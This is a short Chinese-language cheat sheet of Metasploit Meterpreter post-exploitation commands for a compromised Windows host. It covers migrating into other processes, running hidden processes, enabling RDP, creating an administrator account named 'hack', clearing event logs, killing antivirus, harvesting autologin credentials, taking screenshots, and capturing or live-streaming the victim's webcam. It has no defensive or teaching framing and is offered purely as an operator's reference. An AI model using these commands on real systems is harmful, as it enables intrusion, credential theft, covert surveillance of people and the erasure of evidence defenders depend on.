弹消息框
msg /server:127.0.0.1 * "hello"
进程迁移
手动迁移:
查看进程ps
获取meterpreter进程PID getpid
迁移到指定PID进程中migrate 1234
自动迁移
run post/windows/manage/migrate
运行进程
用execute在目标系统中执行指定的程序:
execute -f /usr/test.exe [options]
可选参数:
-H:创建隐藏进程
启用RDP
run post/windows/manage/enable_rdp
添加管理员账号
run getgui -u hack -p hack
清除日志
clearev
查看系统信息 sysinfo
查看是否为虚拟机 run post/windows/gather/checkvm
关闭目标机 shutdown
查看运行时间 idletime
关闭杀软 run post/windows/manage/killav
扫描摄像头: webcam_list
抓拍照片:(保存在root目录下)webcam_snap
直播模式:webcam_stream
访问返回的网址
列举已登录的用户run post/windows/gather/enum_logged_on_users
抓取自动登录的用户名密码
run windows/gather/credentials/windows_autologin
抓取屏幕
screenshot
或
load espia
screengrab